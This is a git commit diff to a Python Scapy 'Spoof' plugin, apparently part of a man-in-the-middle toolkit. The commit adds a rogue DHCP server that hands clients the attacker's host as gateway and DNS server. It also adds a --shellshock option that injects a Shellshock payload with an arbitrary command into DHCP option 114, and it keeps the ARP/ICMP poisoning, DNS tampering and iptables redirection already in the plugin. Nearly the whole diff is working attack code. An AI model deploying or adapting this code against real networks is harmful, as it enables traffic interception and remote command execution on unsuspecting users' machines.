added DHCP spoofing with shellshock options

2025-07-07 13:32:18 -07:00 · 2014-09-30 14:13:06 +02:00 · 2014-09-30 14:13:06 +02:00 · 43c7974d4c
commit 43c7974d4c
parent ff235e3e90
7 changed files with 155 additions and 69 deletions
--- a/plugins/Spoof.py
+++ b/plugins/Spoof.py
@ -13,6 +13,8 @@ from scapy.all import *
 import os
 import sys
 import threading
+import binascii
+import random

 try:
    from configobj import ConfigObj
@ -23,7 +25,7 @@ except:
 class Spoof(Plugin):
    name = "Spoof"
    optname = "spoof"
-    desc = 'Redirect traffic using ICMP, ARP or DNS'
+    desc = 'Redirect/Modify traffic using ICMP, ARP or DHCP'
    has_opts = True

    def initialize(self, options):
@ -33,15 +35,16 @@ class Spoof(Plugin):
        self.arp = options.arp
        self.icmp = options.icmp
        self.dns = options.dns
-        #self.dhcp = options.dhcp
-        self.domain = options.domain
-        self.dnsip = options.dnsip
-        self.dnscfg = options.dnscfg
+        self.dnscfg = "./config_files/dns.cfg" or options.dnscfg
+        self.dhcp = options.dhcp
+        self.dhcpcfg = "./config_files/dhcp.cfg" or options.dhcpcfg
+        self.shellshock = options.shellshock
+        self.cmd = "echo 'pwned'" or options.cmd
        self.gateway = options.gateway
-        self.summary = options.summary
+        #self.summary = options.summary
        self.target = options.target
        self.arpmode = options.arpmode
-        self.port = self.options.listen
+        self.port = options.listen
        self.manualiptables = options.manualiptables  #added by alexander.georgiev@daloo.de
        self.debug = False
        self.send = True
@ -49,6 +52,9 @@ class Spoof(Plugin):
        if os.geteuid() != 0:
            sys.exit("[-] Spoof plugin requires root privileges")

+        if not self.interface:
+            sys.exit('[-] Spoof plugin requires --iface argument')
+
        if self.options.log_level == 'debug':
            self.debug = True

@ -57,12 +63,6 @@ class Spoof(Plugin):
            os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')

        if self.arp:
-            if self.icmp:
-                sys.exit("[-] --arp and --icmp are mutually exclusive")
-
-            if (not self.interface or not self.gateway):
-                sys.exit("[-] ARP Spoofing requires --gateway and --iface")
-
            self.mac = get_if_hwaddr(self.interface)
            self.routermac = getmacbyip(self.gateway)
            print "[*] ARP Spoofing enabled"
@ -70,50 +70,125 @@ class Spoof(Plugin):
                pkt = self.build_arp_req()
            elif self.arpmode == 'rep':
                pkt = self.build_arp_rep()
+            thread_target = self.send
+            thread_args = (pkt, self.interface, self.debug,)

        elif self.icmp:
-            if self.arp:
-                sys.exit("[-] --icmp and --arp are mutually exclusive")
-
-            if (not self.interface or not self.gateway or not self.target):
-                sys.exit("[-] ICMP Redirection requires --gateway, --iface and --target")
-
            self.mac = get_if_hwaddr(self.interface)
            self.routermac = getmacbyip(self.gateway)
            print "[*] ICMP Redirection enabled"
            pkt = self.build_icmp()
+            thread_target = self.send
+            thread_args = (pkt, self.interface, self.debug,)

-        if self.summary:
-            pkt.show()
-            ans = raw_input('\n[*] Continue? [Y|n]: ').lower()
-            if ans == 'y' or len(ans) == 0:
-                pass
-            else:
-                sys.exit(0)
+        elif self.dhcp:
+            print "[*] DHCP Spoofing enabled"
+            self.rand_number = []
+            self.dhcp_dic = {}
+            self.dhcpcfg = ConfigObj(self.dhcpcfg)
+            thread_target = self.dhcp_sniff
+            thread_args = ()

        if self.dns:
-            if not self.dnscfg:
-                if (not self.dnsip or not self.domain):
-                    sys.exit("[-] DNS Spoofing requires --domain, --dnsip")
-            elif self.dnscfg:
-                self.dnscfg = ConfigObj(self.dnscfg)
+            print "[*] DNS Tampering enabled"
+            self.dnscfg = ConfigObj(self.dnscfg)

            if not self.manualiptables:
                os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
-            print "[*] DNS Spoofing enabled"
            self.start_dns_queue()

        file = open('/proc/sys/net/ipv4/ip_forward', 'w')
        file.write('1')
        file.close()
        if not self.manualiptables:
-            print '[*] Setting up iptables rules'
+            print '[*] Setting up iptables'
            os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port)

-        t = threading.Thread(name='send_packets', target=self.send_packets, args=(pkt, self.interface, self.debug,))
+        t = threading.Thread(name='spoof_thread', target=thread_target, args=thread_args)
        t.setDaemon(True)
        t.start()

+    def dhcp_rand_ip(self):
+        pool = self.dhcpcfg['ip_pool'].split('-')
+        trunc_ip = pool[0].split('.'); del(trunc_ip[3])
+        max_range = int(pool[1])
+        min_range = int(pool[0].split('.')[3])
+        number_range = range(min_range, max_range)
+        for n in number_range:
+            if n in self.rand_number:
+                number_range.remove(n)
+        rand_number = random.choice(number_range)
+        self.rand_number.append(rand_number)
+        rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number)
+
+        return rand_ip
+
+    def dhcp_callback(self, resp):
+        if resp.haslayer(DHCP):
+            xid = resp[BOOTP].xid
+            mac_addr = resp[Ether].src
+            raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
+            if xid in self.dhcp_dic.keys():
+                client_ip = self.dhcp_dic[xid]
+            else:
+                client_ip = self.dhcp_rand_ip()
+                self.dhcp_dic[xid] = client_ip
+
+            if resp[DHCP].options[0][1] == 1:
+                logging.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid))
+                logging.info("Sending DHCP OFFER")
+                packet = (Ether(src=get_if_hwaddr(self.interface), dst='ff:ff:ff:ff:ff:ff') /
+                IP(src=get_if_addr(self.interface), dst='255.255.255.255') /
+                UDP(sport=67, dport=68) /
+                BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=get_if_addr(self.interface), xid=xid) /
+                DHCP(options=[("message-type", "offer"),
+                    ('server_id', get_if_addr(self.interface)),
+                    ('subnet_mask', self.dhcpcfg['subnet']),
+                    ('router', get_if_addr(self.interface)),
+                    ('lease_time', 172800),
+                    ('renewal_time', 86400),
+                    ('rebinding_time', 138240),
+                    "end"]))
+
+                try:
+                    packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
+                except KeyError:
+                    pass
+
+                sendp(packet, iface=self.interface, verbose=self.debug)
+
+            if resp[DHCP].options[0][1] == 3:
+                logging.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid))
+                packet = (Ether(src=get_if_hwaddr(self.interface), dst='ff:ff:ff:ff:ff:ff') /
+                IP(src=get_if_addr(self.interface), dst='255.255.255.255') /
+                UDP(sport=67, dport=68) /
+                BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=get_if_addr(self.interface), xid=xid) /
+                DHCP(options=[("message-type", "ack"),
+                    ('server_id', get_if_addr(self.interface)),
+                    ('subnet_mask', self.dhcpcfg['subnet']),
+                    ('router', get_if_addr(self.interface)),
+                    ('lease_time', 172800),
+                    ('renewal_time', 86400),
+                    ('rebinding_time', 138240)]))
+
+                try:
+                    packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
+                except KeyError:
+                    pass
+
+                if self.shellshock:
+                    logging.info("Sending DHCP ACK with shellshock payload")
+                    packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.cmd)))
+                    packet[DHCP].options.append("end")
+                else:
+                    logging.info("Sending DHCP ACK")
+                    packet[DHCP].options.append("end")
+
+                sendp(packet, iface=self.interface, verbose=self.debug)
+
+    def dhcp_sniff(self):
+        sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=self.interface)
+
    def send_packets(self, pkt, interface, debug):
        while self.send:
            sendp(pkt, inter=2, iface=interface, verbose=debug)
@ -168,7 +243,7 @@ class Spoof(Plugin):
                      DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))

        payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
-        logging.info("%s Spoofed DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
+        logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))

    def start_dns_queue(self):
        self.q = nfqueue.queue()
@ -191,19 +266,21 @@ class Spoof(Plugin):
        return 'queue'

    def add_options(self,options):
-        options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing')
-        options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects')
-        options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests')
-       # options.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using fake DHCP offers')
+        group = options.add_mutually_exclusive_group(required=False)
+        group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
+        group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
+        group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
+        options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
+        options.add_argument('--shellshock', dest='shellshock', action='store_true', default=False, help='Trigger the Shellshock vuln when spoofing DHCP')
+        options.add_argument('--cmd', type=str, dest='cmd', help='Command to run on vulnerable clients [default: echo pwned]')
+        options.add_argument("--dnscfg", type=file, help="DNS tampering config file [default: dns.cfg]")
+        options.add_argument("--dhcpcfg", type=file, help="DHCP spoofing config file [default: dhcp.cfg]")
        options.add_argument('--iface', dest='interface', help='Specify the interface to use')
        options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
        options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
        options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
-        options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
-        options.add_argument('--domain', type=str, dest='domain', help='Domain to spoof [e.g google.com]')
-        options.add_argument('--dnsip', type=str, dest='dnsip', help='IP address to resolve dns queries to')
-        options.add_argument("--dnscfg", type=file, help="Specify a config file")
-        options.add_argument('--manualiptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables of flush iptables rules automatically')
+        #options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
+        options.add_argument('--manualiptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')

    def finish(self):
        self.send = False
@ -212,7 +289,7 @@ class Spoof(Plugin):
        file.write('0')
        file.close()
        if not self.manualiptables:
-            print '\n[*] Flushing iptables rules'
+            print '\n[*] Flushing iptables'
            os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')

        if self.dns: